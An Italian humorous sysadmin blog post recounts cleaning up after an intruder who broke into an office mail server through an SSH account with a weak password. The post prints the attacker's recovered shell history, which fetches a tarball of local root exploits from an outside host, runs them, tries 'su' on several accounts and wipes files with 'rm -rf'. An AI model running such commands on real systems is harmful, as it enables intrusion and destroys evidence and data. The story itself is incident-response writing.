Ricerca in FOLBlog

[SdSM] Cracking Time

 Scritto da alle 09:00 del 25/01/2009  Aggiungi commenti
Gen 252009
 
closeQuesto articolo è stato pubblicato 8 anni 6 mesi 27 giorni giorni fa quindi alcuni contenuti o informazioni presenti in esso potrebbero non essere più validi. Questo sito non è responsabile per eventuali errori causati da questo problema.

Cracking
Sono le sette (7) di mattina, ho appena finito di fare colazione e leggermi il giornale e mi sto avviando verso la doccia quando mi suona il cellofono. Rispondo chiedendomi chi piffero mi chiama a cotesta antelucana ora.

B – D? Sono B. Senti, qui è successo un casino dovresti venire a dare un occhiata.

Non devo dire come è che B ha il mio numero di cellofono eh?

IO – ? Io? Alle sette di mattina? E perché io?
B – Ti ricordi l’altra volta quando abbiamo scoperto quei PC di $noivendiamoariafritta nell’armadio? Ecco, ci sono altri problemi e penso che dovresti dare un occhiata a qualche cosa.
IO – Hemmm… io dovrei andare in ufficio…
B – Chiamo DB e gli dico che vieni qui per fare una cosa importantissima.
IO – Ma seriamente, non potete aspettare nel pom…
B – Nooooo!!!!!

Comunque, dopo un certo tira-e-molla ed una chiamata diretta a DB che da la sua benedizione (e la mia doccia per ritornare in forma quasi umana), mi dirigo verso $noivendiamobigliettisuinternet (che in effetti sta a 5 km da casa mia).

Lì B mi agguanta e mi spiega che succede.

B – Allora, stamani la nostra receptionista è arrivata molto presto e non riusciva a leggere la sua posta.
IO – E che c’è di strano? Si sarà scordata la password.
B – No, non si era scordata la password, perché non la cambia mai, ma qualcuno l’aveva cambiata per lei e no non sono stata io a cambiarla e si io sono l’unica che può cambiare le password degli utenti.
IO – (aspettando il seguito) …e?
B – Da quando in qua le password si cambiano da sole?
IO – Huemmm… di solito non succede. Vabbe’ vediamo sta cosa.

Così andiamo in Sala Macchine, perché B (ragazza intelligente) ha staccato il cavo di rete del server di posta interno, che fa anche da gateway verso internet per l’ufficio. Attacco una tastiera ed un monitor e guardo. Un ‘last’ mi dice che gli unici che hanno fatto login sono B dalla console alle 7 di mattina e UL di $noivendiamoariafritta via SSH alle 2 del mattino… Quest’ultimo risulta aver fatto login da un IP di AOL. Qui gatta ci cova.

Un controllino nella homedir di UL la rivela vuota. Vuota. Sento puzza di bruciato. Come minimo dovrebbe esserci un .bash_history se ha fatto login via SSH.

Un controllo nel log di sistema mi dice che “UL” ha sbagliato password 2 volte prima di accedere. Non sembra un brute-force attack.

Sfodero la chiavetta USB ed installo il mio root-kit-test, un controllo non riporta cose strane. Un rapido test mi dice che gli unici files modificati in /etc sono /etc/passwd ed /etc/shadow, ma a questo punto non sono del tutto sicuro di quanto posso fidarmi di questa macchina.

IO – Mi sa che hai fatto bene a chiamarmi e che questa macchina dovrà essere reinstallata, tanto per stare sul sicuro. Sai mica che password aveva UL?
B – Non lo so ma posso scoprirlo.
IO – Ok, tu vai e scopri che io vedo qui che posso scoprire.

Mi viene in mente a quel punto che il backup parte alle 2.30, e magari ha ‘salvato’ qualche cosa di interessante. Quindi guardo sul disco USB (che viene montato e smontato dalla procedura di backup) e vedo che la directory di UL non è vuota nel backup di ieri. O gioia. Così riesco a scovare questo interessante frammento di storia:


w
uname -a
ps aux
ls -a
last
ps aux
mailq
ls -a
cat /etc/issue
ps ax
wget makingcash.ucoz.co.uk/Muistul.tgz
tar xzvf Muistul.tgz
cd .local/
./2007
./raptor
ls
ps aux
last root
ps ax
uname -a
cat /etc/passwd
su receptions
su B
su SL
su CL
su ...
cat /etc/passwd
su ...
su ...
su ...
ls -a
cd /tmp
ls -a
rm -rf .* *
cd /var/tmp
ls -a
rm -rf .* *
cd ~
ls -a
cat .bash_history
rm -rf .* *
passwd
ps aux
ls -a
last
clear
cat /etc/issue
exit

“makingcash” eh? Un rapido controllo mi dice che quel file contiene un paio di local root exploit,

che purtroppo per il nostro sedicente cracker, non funzionano su questo kernel.

Il tipo non mi sembra poi tanto scafato, io avrei cercato di fare login su altre macchine della rete, questo invece sembra si sia concentrato solo su questa e neanche tanto. Ma il ‘su’ verso la receptionista ha funzionato, quindi controllo il .bash_history della receptionista e vedo che il tipo ha cambiato la password (confermando i sospetti di B) e poco altro.

Gli altri “su” non hanno dato frutti. Un dubbio atroce mi piglia e controllo. No, per fortuna UL non era in sudo. Non che il tipo ci abbia provato comunque.

B ritorna con una faccia schifata.

B – Ci crederesti? La sua password era $nomediUL123.

IO – E adesso è “seilicenziatoidiota”?

B – Dimmi che non ci è entrato dentro qualcuno!

IO – Sorry. Ma si, è entrato dentro qualcuno. Ma non mi sembra che abbia fatto molto. In ogni caso l’unico accesso che aveva era in questa macchina no? Quindi anche se aveva una password idiota non ha potuto fare danni altrove. Vedi che a volte il non avere un sistema di autenticazione centralizzato è un bene?

A questo punto B ha insistito per offrirmi la colazione nel baretto all’angolo e poi ho speso il resto della giornata reinstallando la macchina e controllando gli altri sistemi dell’ufficio. Dai discorsi che ho udito non credo che $noivendiamoariafritta venderà molto in questo posto.

Davide

legenda personaggi

Technorati Tags: Storie dalla Sala Macchine,humor

Articoli simili:

  • Facebook
  • Twitter
  • Delicious
  • StumbleUpon
  • Wikio
  • Reddit
  • Technorati
  • Segnalo
  • Live
  • Add to favorites
  • Email
  • RSS

 Lascia un commento

Puoi usare questi tag e attributi HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(richiesto)

(richiesto)

Pinterest
EmailEmail
PrintPrint
%d blogger hanno fatto clic su Mi Piace per questo: